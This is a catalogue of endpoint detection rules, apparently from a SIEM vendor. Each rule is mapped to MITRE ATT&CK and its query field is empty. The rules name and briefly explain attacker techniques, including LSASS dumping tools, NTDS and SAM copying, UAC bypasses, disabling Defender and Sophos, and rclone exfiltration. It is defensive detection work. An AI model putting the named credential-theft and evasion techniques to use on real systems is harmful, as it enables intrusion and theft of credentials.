Trigger Condition: Disabling of User Access Control (UAC) in the endpoint. Adversaries may disable UAC to execute code directly with high integrity.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Account Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Behavior Related to Named Pipe Impersonation
Trigger Condition: Suspicious events related to named pipe impersonation are detected, such as creating a named pipe, creating a service with a named pipe, and using a named pipe in the command line. Adversaries use named pipe impersonation for privilege escalation and to evade defense.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: Access Token Manipulation
ATT&CK ID: T1134
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Usage of Ngrok Utility Detected
Trigger Condition: This alert is triggered whenever it detects the execution of Ngrok utility is detected. Ngrok is a cross-platform applications that allows users to expose local servers behind NATs and firewalls to the public internet over secure tunnels. Threat actors often use Ngrok to expose internal services to the internet like making RDP publicly accessible. False positives could arise from another tools that uses the same command line switches as Ngrok. ‘
ATT&CK Category: Command and Control
ATT&CK Tag: Protocol Tunneling
ATT&CK ID: T1572
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Chrome Addition of VPN Extension
Trigger Condition: This alert rule detects the addition of well known VPN Extension in Chrome. Extensions are small software programs that customize the browsing experience, while VPN extension allows VPN functionality within the browser. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. False positives may occur when a VPN Extension is added in Chrome for legitimate reasons. List ‘CHROME_VPN_EXTENSIONS’ is required for this alert rule.
ATT&CK Category: Initial Access, Persistence
ATT&CK Tag: External Remote Services
ATT&CK ID: T1133
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Outlook Security Settings Change
Trigger Condition: Modification to Outlook configuration through creating a security registry key. Changes to configuration can allow adversaries to run macros covertly without notifying users.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Certutil Command Detected
Trigger Condition: Suspicious Certutil utility execution with parameters like decode or urlcache, which adversaries can use to download payloads from remote locations or encode/decode base64 obfuscated payloads.
ATT&CK Category: Defense Evasion, Command and Control
ATT&CK Tag: Ingress Tool Transfer, Deobfuscate/Decode Files or Information
ATT&CK ID: T1105, T1140
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Unsigned DLLs loaded by RunDLL32 or RegSvr32
Trigger Condition: Injection of unsigned dynamic-link library (DLL), a common tactic attackers use to execute arbitrary code on Windows systems. Adversaries often leverage Windows builtin tools like RunDLL32 or RegSvr32 to execute the malicious code through unsigned or untrusted DLLs.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Regsvr32, Rundll32
ATT&CK ID: T1218.010, T1218.011
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Terminal Service Configuration Modified
Trigger Condition: Modifying settings related to terminal services. Adversaries can use this technique to bypass authentication requirements or bypass security settings.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_System Service Reconnaissance through WMI
Trigger Condition: This alert is triggered whenever usage of WMI for service reconnaissance is detected.
ATT&CK Category: Execution, Discovery
ATT&CK Tag: System Service Discovery, Windows Management Instrumentation
ATT&CK ID: T1007, T1047
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Reconnaissance through WMI
Trigger Condition: This alert is triggered whenever it detects the usage of WMI for listing Processes running on the compromised host.
ATT&CK Category: Execution, Discovery
ATT&CK Tag: Windows Management Instrumentation, System Service Discovery
ATT&CK ID: T1047, T1007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Process Created through WMI
Trigger Condition: This alert is triggered whenever it detects the usage of WMI to spawn new processes either on local or remote host.
ATT&CK Category: Execution
ATT&CK Tag: Windows Management Instrumentation
ATT&CK ID: T1047
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Local Users Reconnaissance through WMI
Trigger Condition: This alert is triggered whenever it detects the usage of WMI for listing all local user accounts.
ATT&CK Category: Execution, Discovery
ATT&CK Tag: Windows Management Instrumentation, Local Account
ATT&CK ID: T1047, T1087.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Installed Software Updates Reconnaissance through WMI
Trigger Condition: This alert is triggered whenever it detects the usage of WMI to list installed Software hotfix and patches.
ATT&CK Category: Execution, Discovery
ATT&CK Tag: Windows Management Instrumentation, Software Discovery
ATT&CK ID: T1047, T1518
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Application uninstall via WMIC
Trigger Condition: This alert rule is triggered when the Windows Management Instrumentation Command-line (WMIC) tool is detected uninstalling applications on a system.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: Windows Management Instrumentation, Disable or Modify Tools
ATT&CK ID: T1047, T1562.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_AppInit DLLs Detected
Trigger Condition: Adversaries establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Event Triggered Execution, AppInit DLLs
ATT&CK ID: T1546, T1546.010
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_High Severity EPP Alert
Trigger Condition: High or critical severity alert generated by any endpoint protection platform like Crowdstrike and Microsoft Defender for Endpoint.
Minimum Log Source Requirement: CrowdStrikeEPO, Microsoft Defender ATP, Trend Vision
Query:
LP_Host Generating Multiple Medium Severity EPP Alert
Trigger Condition: Multiple medium severity alerts generated by endpoint protection platforms like Crowdstrike and Microsoft Defender for Endpoint.
Minimum Log Source Requirement: CrowdStrikeEPO, Microsoft Defender ATP, Trend Vision
Query:
LP_Host Generating Multiple High Severity EPP Alert
Trigger Condition: Multiple high or critical severity alerts generated by endpoint protection platforms like Crowdstrike and Microsoft Defender for Endpoint.
Minimum Log Source Requirement: CrowdStrikeEPO, Microsoft Defender ATP, Trend Vision
Query:
LP_Medium Severity EPP Alert
Trigger Condition: Medium severity alert generated by any endpoint protection platform like Crowdstrike and Microsoft Defender for Endpoint.
Minimum Log Source Requirement: CrowdStrikeEPO, Microsoft Defender ATP, Trend Vision
Query:
LP_Windows Service Stop or Delete
Trigger Condition: Windows service or process being stopped, deleted or disabled via system binaries is detected. sc.exe, net.exe and net1.exe are Microsoft Windows system internal binaries that adversaries can use to stop or delete services and processes to render those services unavailable to legitimate users or to avoid hindrances in their attack chain.
ATT&CK Category: Impact
ATT&CK Tag: Service Stop
ATT&CK ID: T1489
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Hack Tools Execution
Trigger Condition: This alert is triggered whenever it detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed. The List ‘MALICIOUS_TOOLS_IMPHASH’ must be imported beforehand activating this alert. ”
ATT&CK Category: Credential Access, Resource Development
ATT&CK Tag: OS Credential Dumping, Tool
ATT&CK ID: T1003, T1588.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Execution of XORDump Utility for LSASS Memory Dump
Trigger Condition: This alert is triggered whenever it detects suspicious execution of XORDump Utility, commonly used for LSASS Memory Dump. It is used to dump LSASS memory while also bypassing security measures like AV, EDR etc. In some cases, lsass.exe minidump files are signatured by AV and deleted. The dll loaded into this bin for minidumping (dgbhelp) ALWAYS writes the minidump to disk, but before this binary closes the file handle, it re-reads the contents into memory, closes the handle and immediately deletes the file. the output is safe in memory and passed to an Xor function which then re-writes the xor’d data to disk, where it can be safely exfilled. Adversaries may use this tool to steal LSASS minidump files stealthy bypassing the security.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Execution of Createdump Utility for Memory Dump
Trigger Condition: This alert is triggered whenever it detects the usage of the createdump.exe LOLOBIN utility to dump process memory. createdump.exe is Microsoft .NET Runtime Crash Dump Generator (included in .NET Core). Attackers often leverage this utility to dump LSASS process memory while also evasing the defense. lsass.exe, which stands for Local Security Authority Subsystem Service, is a crucial Windows system process responsible for various security-related functions, including user authentication and managing security policies. Adversaries often seek to dump the lsass.exe process memory because it contains sensitive information, such as user credentials and authentication tokens.
ATT&CK Category: Credential Access, Defense Evasion
ATT&CK Tag: LSASS Memory, Masquerading
ATT&CK ID: T1003.001, T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious DsInternals Get-ADReplAccount Activities
Trigger Condition: Suspicious activities related to Get-ADReplAccount from the DSInternals PowerShell Module are detected. Adversaries may use this tool to maliciously access Domain Controllers’ credentials. For event id 4104, Powershell Script Block logging is required.
ATT&CK Category: Credential Access
ATT&CK Tag: DCSync
ATT&CK ID: T1003.006
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Activities Associated with NTDS Exfiltration
Trigger Condition: This alert is triggered whenever it detects suspicious activities related to the Active Directory Domain Database (ntds.dit). NTDS file is present in the DC and contains sensitive information such as Active Directory data, including credentials, information about user objects, groups, and group membership. Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.
ATT&CK Category: Credential Access
ATT&CK Tag: NTDS
ATT&CK ID: T1003.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Possible LSASS Memory Dump Via Windows Task Manager
Trigger Condition: Creation of a lsass.dmp file by the taskmgr process is detected. Adversaries often seek to dump the lsass.exe process memory because it contains sensitive information, such as user credentials and authentication tokens.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Possible LSASS Dump Via SilentProcessExit Technique
Trigger Condition: This alert is triggered whenever it detects a possible LSASS dump Via the SilentProcessExit Technique. It Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process. SilentProcessExit method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger specific actions for a monitored process in one of two scenarios; either the process terminates itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_NTDS or SAM Database Copy Operation
Trigger Condition: Copy operation of Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files is detected. Adversaries may attempt to access or create a copy of the Active Directory domain database or SAM database to steal credential information and obtain other information about domain members, such as devices, users and access rights.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping, Security Account Manager, NTDS
ATT&CK ID: T1003, T1003.002, T1003.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Microsoft IIS Service Account Password Dumped
Trigger Condition: This alert is triggered whenever it detects the execution of Information Services (IIS) command-line tool, AppCmd, being used to list passwords. An attacker with IIS web server access via a web shell can decrypt and dump the IIS AppPool service account password using AppCmd.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Dumpert Process Dumper Execution
Trigger Condition: This alert is triggered whenever it detects the use of Dumpert process dumper, which dumps the lsass.exe process memory. lsass.exe, which stands for Local Security Authority Subsystem Service, is a crucial Windows system process responsible for various security-related functions, including user authentication and managing security policies. Adversaries often seek to dump the lsass.exe process memory because it contains sensitive information, such as user credentials and authentication tokens. By extracting this information from lsass.exe, attackers can potentially gain unauthorized access to a system or escalate their privileges, making it a high-value target for malicious actors. Detecting and preventing such memory dumps is critical to safeguarding the security of a Windows system.
ATT&CK Category: Credential Access
ATT&CK Tag: LSASS Memory
ATT&CK ID: T1003.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Credential Dump Via NPPSpy
Trigger Condition: Dumping of a possible credential via a tool called NPPSpy is detected. NPPSpy is a Network Provider/Credential Manager DLL that extracts credentials and stores them in plain text. This alert monitors file creation, registry manipulation and process creation events that indicate a potential credential dump via NPPSpy.
ATT&CK Category: Credential Access
ATT&CK Tag: OS Credential Dumping
ATT&CK ID: T1003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Malicious PowerShell Commandlets Detected
Trigger Condition: Execution of malicious PowerShell commandlets.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: PowerShell, Windows
Query:
LP_Suspicious Base64 Encoded PowerShell Command
Trigger Condition: Execution of suspicious base64 encoded commands via PowerShell.
ATT&CK Category: Execution
ATT&CK Tag: PowerShell
ATT&CK ID: T1059.001
Minimum Log Source Requirement: Windows, PowerShell, Windows Sysmon
Query:
LP_Code Execution Via Diskshadow Detected
Trigger Condition: Usage of diskshadow binary to execute code from a file is detected. Adversaries can use diskshadow with -s or /s tag to execute a command from a file and bypass detection.
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Image Mount Indicator in Recent Files
Trigger Condition: Recent element files pointing to .iso, .img, .vhd or .vhdx files are detected. These image files are used in phishing attacks to deliver malware and circumvent the Mark of the Web (MotW) in Windows to execute malicious commands. It is a false positive on server systems, but on workstations, users rarely mount .iso or .img files.
ATT&CK Category: Initial Access, Defense Evasion
ATT&CK Tag: Mark-of-the-Web Bypass, Spearphishing Attachment
ATT&CK ID: T1553.005, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Disk Image File Created
Trigger Condition: Image files with extensions like .iso, .vhd, and .vhdx are downloaded from the internet into a user’s download or temporary folder. Adversaries often deliver their malware payloads through a .iso file format to bypass the Mark of the Web (MotW) in Windows and execute their payload successfully.
ATT&CK Category: Initial Access, Defense Evasion
ATT&CK Tag: Mark-of-the-Web Bypass, Spearphishing Attachment
ATT&CK ID: T1553.005, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_PowerShell Execution via DLL Detected
Trigger Condition: Execution of PowerShell via DLL instead of powershell.exe is detected. Powershell is a command-line shell used in Windows. Adversaries can execute PowerShell for malicious activities even if powershell.exe is blocked and no strict application whitelisting is implemented.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: PowerShell, Rundll32
ATT&CK ID: T1059.001, T1218.011
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Windows Defender Registry keys Modification
Trigger Condition: Changes in the Windows Defender registry settings to disable Windows Defender functionalities. Adversaries try to alter Windows Defender-associated registries to disable protection and detection features.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Disable or Modify Tools
ATT&CK ID: T1562.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Executable Files Created and Executed by Office Applications
Trigger Condition: Executable file dropped or modified via office applications and executed within a specific time range.
ATT&CK Category: Initial Access
ATT&CK Tag: Phishing, Spearphishing Attachment
ATT&CK ID: T1566, T1566.001
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_WMI Backdoor in Exchange Transport Agent
Trigger Condition: This alert is triggered whenever it detects a WMI backdoor in Exchange Transport Agents (ETA) via WMI event filters. Microsoft Exchange Server’s Exchange Transport Agents enable customization and expansion of the mail flow process and are in charge of checking, processing and altering messages as they move through the transport pipeline of the Exchange Server. Adversaries plant WMI backdoors in ETA using WMI event filters in order to maintain persistence or privilege escalation.
ATT&CK Category: Persistence
ATT&CK Tag: Event Triggered Execution, Windows Management Instrumentation Event Subscription
ATT&CK ID: T1546, T1546.003
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Msiexec Usage Detected
Trigger Condition: A .msi file executed from the publicly writable folder, and a command prompt or powershell spawned by msiexec. Adversaries can use this technique to execute their payload by evading defence.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Msiexec
ATT&CK ID: T1218.007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Usage of Advanced IP Scanner
Trigger Condition: Suspicious usage of Advanced IP Scanner is detected.
ATT&CK Category: Reconnaissance, Discovery
ATT&CK Tag: Network Service Discovery, Network Share Discovery, Gather Victim Network Information
ATT&CK ID: T1046, T1135, T1590
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Persistence through Port Monitor Registry modification
Trigger Condition: A new entry in the printer monitor registry is detected.
ATT&CK Category: Persistence
ATT&CK Tag: Boot or Logon Autostart Execution, Port Monitors
ATT&CK ID: T1547, T1547.010
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_File Dropped in Suspicious Location
Trigger Condition: Dropping a file in a suspicious system location is detected.
ATT&CK Category: Command and Control
ATT&CK Tag: Ingress Tool Transfer
ATT&CK ID: T1105
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Alternate PowerShell Hosts via Powershell Module
Trigger Condition: Alternate PowerShell host trying to bypass detections based on powershell.exe. Adversaries can use this technique to potentially bypass detections looking for powershell.exe. They can use it to discover information or execute malicious code.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows
Query:
LP_Suspicious Usage of Where Binary
Trigger Condition: An enumeration attempt on browser bookmarks to learn more about compromised hosts is detected.
ATT&CK Category: Discovery
ATT&CK Tag: Browser Bookmark Discovery
ATT&CK ID: T1217
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_MSHTA - Activity Detected
Trigger Condition: Network connection events initiated by mshta.exe are detected. Adversaries abuse mshta.exe for proxy execution of malicious .hta files, and Javascript or VBScript through a trusted Windows utility.
ATT&CK Category: Defense Evasion, Execution
ATT&CK Tag: Signed Binary Proxy Execution, Mshta
ATT&CK ID: T1218, T1218.005
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Alternate PowerShell Hosts via Named Pipe
Trigger Condition: This alert is triggered whenever it detects alternate Command and Scripting Interpreter, PowerShell hosts. PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary. Adversaries might use this technique to potentially bypass detections looking for powershell.exe. Logging for named pipe events must be configured in Sysmon config for this alert to work. However, Programs using PowerShell directly without invocation of a dedicated interpreter might trigger false positives.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon
Query:
Trigger Condition: Suspicious child process spawned by Microsoft Office Products such as Excel, Powerpoint, Onenote or Visio are detected.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell, Windows Command Shell, Malicious File
ATT&CK ID: T1059, T1059.001, T1059.003, T1204.002
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_RClone Utility Execution
Trigger Condition: Execution of the RClone tool or command line option used in the tool. Adversaries can utilize this utility to exfiltrate data to cloud storage.
ATT&CK Category: Exfiltration
ATT&CK Tag: Exfiltration Over Web Service, Exfiltration to Cloud Storage
ATT&CK ID: T1567, T1567.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_UAC Bypass via SDCLT
Trigger Condition: Attempt to bypass User Account Control (UAC) via SDCLT.exe or modification to registry keys HKCU:SoftwareClassesexefileshellrunascommandisolatedCommand and HKCU:SoftwareClassesFoldershellopencommand indicating UAC bypass via registry key manipulation of sdclt.exe.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Abuse Elevation Control Mechanism, Bypass User Account Control
ATT&CK ID: T1548, T1548.002
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Binary Execution in User Directory
Trigger condition: Execution of binaries from the users directory by Microsoft Office software such as Word and Excel. This may indicate dropping and subsequent execution of payloads by malicious Microsoft Office documents.
ATT&CK Category: Execution
ATT&CK Tag: Malicious File
ATT&CK ID: T1204.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious WMIC Child Process
Trigger condition: Suspicious child process of WMIC is detected. Adversaries can utilize this technique to execute arbitrary commands, payloads, and evade defenses by using Windows internal binary.
ATT&CK Category: Execution
ATT&CK Tag: Windows Management Instrumentation
ATT&CK ID: T1047
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious File Execution Using Wscript or Cscript
Trigger condition: This alert is triggered whenever file with extensions of jse,vbe,js,vba is executed using wscript or cscript. Wscript and cscript are windows binaries that provides an environment in which users can execute scripts in a variety of languages or starts a script to run in a command-line environment. Adversaries can write malicious payloads in file with above mention extensions and execute it using wscript or cscript and bypass detection.
ATT&CK Category: Execution
ATT&CK Tag: Visual Basic, JavaScript
ATT&CK ID: T1059.005, T1059.007
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_BCDEdit Safe Mode Command Execution
Trigger condition: This alert is triggered whenever spawning of BCDEDIT from suspicious processes is detected to configure reboot into Safe Mode. Safe Mode is a diagnostic mode in Windows that starts the system with a limited set of drivers and services, allowing users to troubleshoot problems that may be preventing the system from starting normally. Bcdedit is Windows internal binary that allows users to view and modify the boot configuration data (BCD) settings. Adversaries can use Safe Mode commands such as “minimal”, “network”, and “safebootalternateshell” to bypass security mechanisms and execute arbitrary commands with elevated privileges as limited softwares are services are only available in safe boot mode.
ATT&CK Category: Impact
ATT&CK Tag: Inhibit System Recovery
ATT&CK ID: T1490
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Encoded PowerShell Command Line
Trigger condition: Suspicious PowerShell base64 encoded command is detected. Adversaries can use this technique to evade defense mechanisms by encoding and decoding payload.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Persistence Attack through Accessibility Process Feature
Trigger condition: Accessibility features used to execute a command prompt or other backdoors are detected.
ATT&CK Category: Persistence, Privilege Escalation
ATT&CK Tag: Event Triggered Execution, Accessibility Features
ATT&CK ID: T1546, T1546.008
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Firewall Rule Addition via Netsh Detected
Trigger condition: This alert is triggered whenever a connection is allowed by a port or application on the Windows firewall. An attacker can use the Netsh utility to add or modify firewall rules to allow unauthorized network traffic to bypass the firewall and reach its target. For example, an attacker could use Netsh to allow inbound connections on a specific. Legitimate administration activity and software installations and removal also trigger this alert.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Impair Defenses, Disable or Modify System Firewall
ATT&CK ID: T1562, T1562.004
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Exploitation of CVE-2019-1388 Detected
Trigger condition: An exploitation attempt of CVE-2019-1388 in which the UAC consent dialogue used to invoke a Windows process running as LOCAL_SYSTEM is detected. CVE-2019-1388 is an elevation of privilege vulnerability in the Windows Certificate Dialog.
ATT&CK Category: Privilege Escalation
ATT&CK Tag: Exploitation for Privilege Escalation
ATT&CK ID: T1068
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Sophos EPP Registry Modification
Trigger condition: Modifying Sophos EPP Tamper Protection registry keys to turn off services is detected. Sophos EPP Tamper Protection is the service offered by the EPP that constantly checks if a malware or adversary or rogue employee turns off the AV services to avoid detection.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Office365 Inbox Rule with Special Characters Created
Trigger condition: A new inbox rule created on Office365 with a suspicious name made of only special characters is detected.
ATT&CK Category: Collection
ATT&CK Tag: Email Forwarding Rule
ATT&CK ID: T1114.003
Minimum Log Source Requirement: Office365
Query:
LP_Suspicious WerFault Process Creation
Trigger condition: A services.exe spawns werfault.exe process from non-default paths is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious WerFault File Creation
Trigger condition: A non-system process drops the WerFault.exe binary inside the C:WindowsWinSxSfolder is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Snake Malware Covert Store Registry Key Detected
Trigger condition: A registry operation for the key SECURITYPolicySecretsn is detected. Snake Malware utilizes the registry key to store the encryption key.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Modify Registry
ATT&CK ID: T1112
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious WerFault Service Creation
Trigger condition: A new service installed using the WerFault.exe file is detected. WerFault.exe is a system component that plays a crucial role in Windows operating systems. It manages system error reporting.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Named Pipe Connection to Azure AD Connect Database
Trigger condition: Named pipe connection to Azure AD Connect database from suspicious processes coming from command shells like PowerShell, which may indicate attackers attempting to dump plaintext credentials of AD and Azure AD connector account using tools such as AADInternals is detected.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious Driver Loaded
Trigger condition: Misuse of known drivers by adversaries for malicious purposes is detected. The driver itself are not malicious but are misused by threat actors. For this alert to trigger SUSPICIOUS_DRIVER list is required.
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_AADInternals PowerShell Cmdlet Execution
Trigger condition: Execution of AADInternals commandlets is detected. AADInternals (S0677) toolkit is a PowerShell module containing tools for administering and hacking Azure AD and Office 365. Adversaries use AADInternals to extract the credentials from the system where the AAD Connect server was installed and compromise the AAD environment.
ATT&CK Category: Execution
ATT&CK Tag: Command and Scripting Interpreter, PowerShell
ATT&CK ID: T1059, T1059.001
Minimum Log Source Requirement: Windows, PowerShell
Query:
LP_Suspicious Scheduled Task Creation via Masqueraded XML File
Trigger condition: Creation of a suspicious scheduled task using an XML file with a masqueraded extension.
ATT&CK Category: Persistence, Defense Evasion
ATT&CK Tag: Masquerading, Match Legitimate Name or Location, Scheduled Task/Job and Scheduled Task
ATT&CK ID: T1036, T1036.005, T1053 and T1053.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious Microsoft Equation Editor Child Process
Trigger condition: This alert is triggered whenever suspicious child process of Microsoft’s equation editor is detected which is a sign of possible exploitation of CVE-2017-11882. CVE-2017-11882 is a vulnerability in Microsoft Office’s Equation Editor component. An attacker might use the vulnerability to execute arbitrary code on a target system by producing a malicious Microsoft Office file (such as a Word document) that, when opened, activates the vulnerability.
ATT&CK Category: Execution
ATT&CK Tag: Exploitation for Client Execution
ATT&CK ID: T1203
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Windows Error Process Masquerading
Trigger condition: Suspicious Windows error reporting process behavior, where network connections are made after execution is detected.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masquerading
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Bypass UAC via CMSTP Detected
Trigger condition: Child processes of automatically elevated Microsoft Connection Manager Profile Installer instances like cmstp.exe are detected.
ATT&CK Category: Privilege Escalation, Defense Evasion
ATT&CK Tag: CMSTP, Bypass User Account Control
ATT&CK ID: T1218.003, T1548.002
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Application Whitelisting Bypass via Dxcap Detected
Trigger condition: This alert is triggered whenever adversaries bypass process and/or signature-based defenses by execution of Dxcap.exe is detected. DXCap.exe is a command-line tool for graphics diagnostics capture and playback. Adversaries may take advantage of this trusted developer utility to proxy the execution of malicious payloads. Legitimate execution of dxcap.exe by a legitimate user could generate false-positives.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Trusted Developer Utilities Proxy Execution
ATT&CK ID: T1127
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Suspicious WMIC XSL Script Execution
Trigger condition: Loading of a Windows Script module through WMIC by Microsoft Core XML Services (MSXML) process to bypass application whitelisting. Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control.
ATT&CK Category: Defense Evasion
ATT&CK Tag: XSL Script Processing
ATT&CK ID: T1220
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Suspicious File Execution via MSHTA
Trigger condition: Execution of javascript or VBScript files and other abnormal extension files executed via mshta binary is detected.
ATT&CK Category: Execution, Defense Evasion
ATT&CK Tag: JavaScript, Deobfuscate/Decode Files or Information, Mshta
ATT&CK ID: T1059.007, T1140, T1218.005
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Regsvr32 Anomalous Activity Detected
Trigger condition: This alert is triggered whenever it detects various anomalous Regsvr32.exe activities. Regsvr32 is a command-line utility used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Adversaries often abuses Regsvr32 for proxy execution of malicious code.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Signed Binary Proxy Execution, Regsvr32
ATT&CK ID: T1218, T1218.010
Minimum Log Source Requirement: Windows Sysmon, Windows
Query:
LP_Execution of Trojanized 3CX Application
Trigger Condition: Execution of the trojanized version of the 3CX Desktop is detected. 3CX Desktop versions 18.12.407 and 18.12.416 are known to be trojanized by the Lazarus Group and are also signed using the 3CX signature.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Masqueradings
ATT&CK ID: T1036
Minimum Log Source Requirement: Windows Sysmon
Query:
LP_Msbuild Spawned by Unusual Parent Process
Trigger condition: Suspicious use of msbuild.exe by an uncommon parent process is detected. msbuild.exe is a legitimate Microsoft tool used for building and deploying software applications.
ATT&CK Category: Defense Evasion
ATT&CK Tag: Trusted Developer Utilities Proxy Execution, MSBuild
ATT&CK ID: T1127, T1127.001
Minimum Log Source Requirement: Windows, Windows Sysmon
Query:
LP_Suspicious Files Designated as System Files Detected
